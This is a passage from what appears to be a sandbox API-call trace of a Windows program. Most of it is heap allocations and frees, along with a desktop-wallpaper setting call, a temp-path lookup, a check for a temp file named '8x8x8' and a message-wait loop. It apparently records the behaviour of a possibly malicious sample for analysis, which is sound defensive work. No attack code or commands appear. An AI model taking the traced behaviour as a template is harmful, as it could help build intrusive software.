dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0288.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0288.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0288.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0288.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0288.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0288.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0288.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0288.731] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0288.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e699c8 [0288.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e699c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0288.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0288.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0288.732] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0288.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0288.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0288.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0288.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0288.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0288.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0288.732] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0288.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0288.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0288.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0288.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0288.804] FreeLibrary (hLibModule=0x750c0000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0288.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0288.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0288.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0288.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0288.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0288.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0288.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0288.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0288.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0288.807] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0288.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.807] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0288.808] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0288.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.808] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0288.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0288.809] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0288.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0288.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0288.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0288.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0288.809] timeGetTime () returned 0x11884ce [0288.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.809] Sleep (dwMilliseconds=0xa) [0288.879] timeGetTime () returned 0x1188515 [0288.879] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.879] Sleep (dwMilliseconds=0xa) [0288.952] timeGetTime () returned 0x118855d [0288.952] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0288.952] TranslateMessage (lpMsg=0x8cf798) returned 0 [0288.952] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0288.952] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0288.952] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0288.952] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.952] Sleep (dwMilliseconds=0xa) [0289.024] timeGetTime () returned 0x11885a6 [0289.024] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.024] Sleep (dwMilliseconds=0xa) [0289.094] timeGetTime () returned 0x11885eb [0289.094] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.094] Sleep (dwMilliseconds=0xa) [0289.181] timeGetTime () returned 0x1188642 [0289.181] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.181] Sleep (dwMilliseconds=0xa) [0289.246] timeGetTime () returned 0x1188683 [0289.246] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.246] Sleep (dwMilliseconds=0xa) [0289.304] timeGetTime () returned 0x11886bd [0289.304] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 